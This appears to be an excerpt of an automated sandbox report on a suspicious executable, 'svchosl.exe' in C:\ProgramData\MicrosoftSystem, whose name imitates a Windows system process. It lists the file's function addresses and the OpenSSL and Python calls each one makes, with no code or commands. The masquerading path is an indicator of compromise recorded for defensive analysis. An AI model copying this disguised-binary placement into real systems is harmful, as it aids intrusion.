Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B802F640 CRYPTO_free,CRYPTO_free,CRYPTO_strndup, 16_2_00007FF8B802F640
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE24B9 OPENSSL_sk_new_null,d2i_X509,CRYPTO_free,OPENSSL_sk_push,OPENSSL_sk_num,CRYPTO_memcmp,CRYPTO_free,X509_free,OPENSSL_sk_pop_free,OPENSSL_sk_value,X509_get0_pubkey,X509_free,OPENSSL_sk_shift,OPENSSL_sk_pop_free, 16_2_00007FF8B7FE24B9
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FFF6F0 CRYPTO_zalloc,ERR_put_error,CRYPTO_free, 16_2_00007FF8B7FFF6F0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8037720 CRYPTO_memcmp, 16_2_00007FF8B8037720
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE9770 CRYPTO_malloc,ERR_put_error,CRYPTO_free, 16_2_00007FF8B7FE9770
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8001790 CRYPTO_free,CRYPTO_strdup, 16_2_00007FF8B8001790
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B801F7A0 CRYPTO_free,CRYPTO_free, 16_2_00007FF8B801F7A0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B804B7A0 SRP_Calc_u,BN_num_bits,CRYPTO_malloc,BN_bn2bin,BN_clear_free,BN_clear_free,CRYPTO_clear_free,BN_clear_free, 16_2_00007FF8B804B7A0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1505 CRYPTO_free,CRYPTO_malloc,ERR_put_error,memcpy, 16_2_00007FF8B7FE1505
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1F0F CRYPTO_free,CRYPTO_malloc,memcpy, 16_2_00007FF8B7FE1F0F
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8019810 CRYPTO_free,CRYPTO_memdup, 16_2_00007FF8B8019810
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B80278A7 CRYPTO_clear_free, 16_2_00007FF8B80278A7
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1104 EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free, 16_2_00007FF8B7FE1104
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE22B1 ERR_put_error,CRYPTO_free,CRYPTO_strdup, 16_2_00007FF8B7FE22B1
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B803E910 EVP_PKEY_CTX_new,X509_get0_pubkey,ERR_clear_error,EVP_PKEY_decrypt,EVP_PKEY_CTX_ctrl,EVP_PKEY_CTX_free, 16_2_00007FF8B803E910
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1BEF ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_put_error,CRYPTO_free,OPENSSL_LH_new,OPENSSL_sk_num,EVP_get_digestbyname,EVP_get_digestbyname,OPENSSL_sk_new_null,OPENSSL_sk_new_null,CRYPTO_new_ex_data,RAND_bytes,RAND_priv_bytes,RAND_priv_bytes,RAND_priv_bytes, 16_2_00007FF8B7FE1BEF
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B802A940 X509_get0_pubkey,CRYPTO_malloc,RAND_bytes,EVP_PKEY_CTX_new,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_PKEY_CTX_free, 16_2_00007FF8B802A940
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B80189D0 EVP_MD_size,EVP_MD_CTX_new,EVP_DigestInit_ex,EVP_DigestFinal_ex,EVP_DigestInit_ex,BIO_ctrl,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_PKEY_new_raw_private_key,EVP_DigestSignInit,EVP_DigestUpdate,EVP_DigestSignFinal,CRYPTO_memcmp,OPENSSL_cleanse,OPENSSL_cleanse,EVP_PKEY_free,EVP_MD_CTX_free, 16_2_00007FF8B80189D0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1B54 EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,EVP_PKEY_free,CRYPTO_free, 16_2_00007FF8B7FE1B54
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B802CA20 CRYPTO_free,CRYPTO_free, 16_2_00007FF8B802CA20
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FFEA40 CRYPTO_THREAD_run_once,OPENSSL_sk_find,OPENSSL_sk_value,EVP_CIPHER_flags,EVP_get_cipherbyname,EVP_get_cipherbyname,EVP_get_cipherbyname,EVP_get_cipherbyname,EVP_get_cipherbyname, 16_2_00007FF8B7FFEA40
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8026A70 CRYPTO_free,CRYPTO_memdup, 16_2_00007FF8B8026A70
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE2063 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,memset, 16_2_00007FF8B7FE2063
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B801EA60 CRYPTO_realloc, 16_2_00007FF8B801EA60
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE23D3 CRYPTO_free,CRYPTO_malloc,memcmp,CRYPTO_memdup, 16_2_00007FF8B7FE23D3
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FEEA80 EVP_MD_CTX_md,EVP_MD_size,CRYPTO_memcmp,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,CRYPTO_memcmp, 16_2_00007FF8B7FEEA80
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8014AD0 CRYPTO_malloc,CRYPTO_THREAD_lock_new,CRYPTO_new_ex_data,X509_up_ref,X509_chain_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,CRYPTO_strdup,CRYPTO_memdup,ERR_put_error,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup, 16_2_00007FF8B8014AD0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE24BE CRYPTO_malloc,ERR_put_error,memcpy,CRYPTO_free,CRYPTO_free, 16_2_00007FF8B7FE24BE
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8040AF0 CRYPTO_free,CRYPTO_memdup, 16_2_00007FF8B8040AF0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE8AF0 CRYPTO_free, 16_2_00007FF8B7FE8AF0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FF6B53 CRYPTO_free,CRYPTO_strdup,ERR_put_error,ERR_put_error, 16_2_00007FF8B7FF6B53
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B803CBB0 OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,memcmp,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,CRYPTO_memcmp,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free, 16_2_00007FF8B803CBB0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1848 CRYPTO_zalloc,CRYPTO_free, 16_2_00007FF8B7FE1848
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8012BA0 CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_clear_free, 16_2_00007FF8B8012BA0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1253 CRYPTO_free, 16_2_00007FF8B7FE1253
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8016C50 CRYPTO_free, 16_2_00007FF8B8016C50
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE23C4 CRYPTO_free,CRYPTO_memdup, 16_2_00007FF8B7FE23C4
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FF6C53 ERR_put_error,CRYPTO_free,CRYPTO_strdup, 16_2_00007FF8B7FF6C53
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B803EC80 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse, 16_2_00007FF8B803EC80
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B801ECA0 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 16_2_00007FF8B801ECA0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B802ACC0 BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup, 16_2_00007FF8B802ACC0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8016CF0 CRYPTO_free,CRYPTO_free, 16_2_00007FF8B8016CF0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE212B EVP_MD_CTX_new,EVP_MD_CTX_copy_ex,CRYPTO_memcmp,memcpy,memcpy, 16_2_00007FF8B7FE212B
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE191A ERR_put_error,memcpy,OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_new_reserve,OPENSSL_sk_value,CRYPTO_dup_ex_data,BIO_ctrl,BIO_ctrl,BIO_up_ref,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup, 16_2_00007FF8B7FE191A
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE179E CRYPTO_free, 16_2_00007FF8B7FE179E
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8026D00 CRYPTO_free,CRYPTO_strndup, 16_2_00007FF8B8026D00
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE18B6 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,memset, 16_2_00007FF8B7FE18B6
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B800CD70 CRYPTO_malloc,CRYPTO_clear_free, 16_2_00007FF8B800CD70
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8008D80 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock, 16_2_00007FF8B8008D80
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE2301 CRYPTO_free,CRYPTO_memdup, 16_2_00007FF8B7FE2301
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8032DB0 CRYPTO_malloc,memcpy, 16_2_00007FF8B8032DB0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1028 EVP_PKEY_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_new,RSA_pkey_ctx_ctrl,CRYPTO_free,EVP_MD_CTX_free,EVP_MD_CTX_free, 16_2_00007FF8B7FE1028
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE8E00 CRYPTO_malloc,ERR_put_error, 16_2_00007FF8B7FE8E00
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8016E40 CRYPTO_free, 16_2_00007FF8B8016E40
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B804AE40 memset,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_put_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,memset, 16_2_00007FF8B804AE40
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE141F EVP_PKEY_get1_tls_encodedpoint,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free, 16_2_00007FF8B7FE141F
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8016EB0 CRYPTO_free, 16_2_00007FF8B8016EB0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B803AEB0 CRYPTO_memcmp, 16_2_00007FF8B803AEB0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8030F00 CRYPTO_free, 16_2_00007FF8B8030F00
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE18C0 ERR_put_error,CRYPTO_free,CRYPTO_strdup, 16_2_00007FF8B7FE18C0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8046F30 CRYPTO_free,CRYPTO_malloc,ERR_put_error, 16_2_00007FF8B8046F30
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE242D CRYPTO_free,CRYPTO_memdup,ERR_put_error, 16_2_00007FF8B7FE242D
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1A05 EVP_MD_size,EVP_CIPHER_iv_length,EVP_CIPHER_key_length,CRYPTO_clear_free,CRYPTO_malloc, 16_2_00007FF8B7FE1A05
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B803EF80 EVP_PKEY_get0_RSA,RSA_size,RSA_size,CRYPTO_malloc,RAND_priv_bytes,CRYPTO_free, 16_2_00007FF8B803EF80
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8002FD0 ERR_put_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once, 16_2_00007FF8B8002FD0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8008FE0 ERR_put_error,ERR_put_error,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_free,ERR_put_error,OPENSSL_sk_dup,X509_VERIFY_PARAM_new,X509_VERIFY_PARAM_inherit,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_malloc,memcpy,CRYPTO_new_ex_data, 16_2_00007FF8B8008FE0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE9020 CRYPTO_zalloc,ERR_put_error, 16_2_00007FF8B7FE9020
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE2275 CRYPTO_free, 16_2_00007FF8B7FE2275
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FF9040 ERR_put_error,ASN1_item_free,memcpy,_time64,X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ASN1_item_free, 16_2_00007FF8B7FF9040
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE2496 CRYPTO_free,CRYPTO_malloc,memcpy, 16_2_00007FF8B7FE2496
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1ACD CRYPTO_zalloc,ERR_put_error,_time64,CRYPTO_THREAD_lock_new,ERR_put_error,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free, 16_2_00007FF8B7FE1ACD
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B800F0E0 CRYPTO_free,EVP_PKEY_free,CRYPTO_free, 16_2_00007FF8B800F0E0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1B9F CRYPTO_free,CRYPTO_malloc, 16_2_00007FF8B7FE1B9F
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8032110 EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset,memcpy,memcpy, 16_2_00007FF8B8032110
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE20FB CRYPTO_malloc, 16_2_00007FF8B7FE20FB
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1EA1 CRYPTO_strdup,CRYPTO_free, 16_2_00007FF8B7FE1EA1
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1E97 memchr,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,CRYPTO_memcmp, 16_2_00007FF8B7FE1E97
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE19E7 CRYPTO_malloc,ERR_put_error,CRYPTO_free, 16_2_00007FF8B7FE19E7
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B802A190 EVP_DigestUpdate,EVP_MD_CTX_free,EVP_PKEY_CTX_free,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free, 16_2_00007FF8B802A190
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B80281AE CRYPTO_free,CRYPTO_free, 16_2_00007FF8B80281AE
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE2130 ERR_put_error,CRYPTO_realloc,CRYPTO_realloc,ERR_put_error, 16_2_00007FF8B7FE2130
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE19B5 CRYPTO_malloc, 16_2_00007FF8B7FE19B5
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1C1C EVP_CIPHER_key_length,EVP_CIPHER_iv_length,CRYPTO_malloc, 16_2_00007FF8B7FE1C1C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B800C290 CRYPTO_free,CRYPTO_free, 16_2_00007FF8B800C290
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE2239 BIO_s_file,BIO_new,BIO_ctrl,strncmp,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free, 16_2_00007FF8B7FE2239
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B800C380 ERR_put_error,CRYPTO_realloc,CRYPTO_realloc,ERR_put_error, 16_2_00007FF8B800C380
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B80463A0 CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free, 16_2_00007FF8B80463A0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE150F CRYPTO_free, 16_2_00007FF8B7FE150F
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1357 memcmp,memcmp,EVP_CIPHER_CTX_free,CRYPTO_free,CRYPTO_free,memcmp,memcmp,memcpy,CRYPTO_free,CRYPTO_free, 16_2_00007FF8B7FE1357
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE18CA CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_memdup, 16_2_00007FF8B7FE18CA
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE4407 CRYPTO_zalloc,ERR_put_error,BIO_set_init,BIO_set_data,BIO_clear_flags, 16_2_00007FF8B7FE4407
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FF8430 CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse, 16_2_00007FF8B7FF8430
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE24F5 CRYPTO_free, 16_2_00007FF8B7FE24F5
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B80044C0 X509_VERIFY_PARAM_free,CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_free,ENGINE_finish,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,CRYPTO_THREAD_lock_free,CRYPTO_free, 16_2_00007FF8B80044C0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1EEC EVP_MD_CTX_new,X509_get0_pubkey,EVP_PKEY_id,EVP_PKEY_id,EVP_PKEY_id,EVP_PKEY_size,EVP_DigestVerifyInit,EVP_PKEY_id,CRYPTO_malloc,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,EVP_DigestUpdate,EVP_MD_CTX_ctrl,EVP_DigestVerify,BIO_free,EVP_MD_CTX_free,CRYPTO_free, 16_2_00007FF8B7FE1EEC
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FFA530 CRYPTO_THREAD_run_once, 16_2_00007FF8B7FFA530
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1230 memcpy,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,memcmp,_time64, 16_2_00007FF8B7FE1230
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B800C540 ERR_put_error,ERR_put_error,ERR_put_error,EVP_MD_size,ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_malloc,ERR_put_error,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,ERR_put_error,EVP_PKEY_free,X509_get0_pubkey,X509_free,OPENSSL_sk_push,ERR_put_error,X509_free,ERR_put_error, 16_2_00007FF8B800C540
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE8560 CRYPTO_zalloc,ERR_put_error, 16_2_00007FF8B7FE8560
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B802A5D0 memset,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free, 16_2_00007FF8B802A5D0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE8610 CRYPTO_zalloc,ERR_put_error,BUF_MEM_grow, 16_2_00007FF8B7FE8610
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE4630 BIO_get_data,BIO_get_shutdown,BIO_get_init,BIO_clear_flags,BIO_set_init,CRYPTO_free, 16_2_00007FF8B7FE4630
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8012620 CRYPTO_THREAD_write_lock,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock, 16_2_00007FF8B8012620
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1F82 CRYPTO_free,BIO_clear_flags,BIO_set_flags,BIO_snprintf,ERR_add_error_data,memcpy, 16_2_00007FF8B7FE1F82
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1FA0 BN_bin2bn,BN_is_zero,CRYPTO_free,CRYPTO_strdup,CRYPTO_clear_free, 16_2_00007FF8B7FE1FA0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE22C5 ERR_put_error,CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free, 16_2_00007FF8B7FE22C5
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE17B2 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock, 16_2_00007FF8B7FE17B2
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FFC710 CRYPTO_get_ex_new_index, 16_2_00007FF8B7FFC710
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8016700 CRYPTO_free, 16_2_00007FF8B8016700
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE184D CRYPTO_free, 16_2_00007FF8B7FE184D
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8030740 EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 16_2_00007FF8B8030740
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8016770 CRYPTO_free,CRYPTO_strdup,CRYPTO_free, 16_2_00007FF8B8016770
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FFC770 i2d_X509_NAME,i2d_X509_NAME,memcmp,CRYPTO_free,CRYPTO_free, 16_2_00007FF8B7FFC770
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1726 CRYPTO_free,CRYPTO_strndup, 16_2_00007FF8B7FE1726
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B80307E0 CRYPTO_malloc,ERR_put_error,CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_zalloc,ERR_put_error,CRYPTO_free, 16_2_00007FF8B80307E0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1D9D CONF_parse_list,ERR_put_error,CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free, 16_2_00007FF8B7FE1D9D
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE252C CRYPTO_malloc,ERR_put_error,BIO_snprintf, 16_2_00007FF8B7FE252C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1B40 CRYPTO_THREAD_write_lock,OPENSSL_LH_set_down_load,CRYPTO_THREAD_unlock, 16_2_00007FF8B7FE1B40
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B93C526C i2d_X509,PyBytes_FromStringAndSize,CRYPTO_free, 16_2_00007FF8B93C526C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B93C54E0 ASN1_STRING_to_UTF8,_Py_BuildValue_SizeT,CRYPTO_free, 16_2_00007FF8B93C54E0
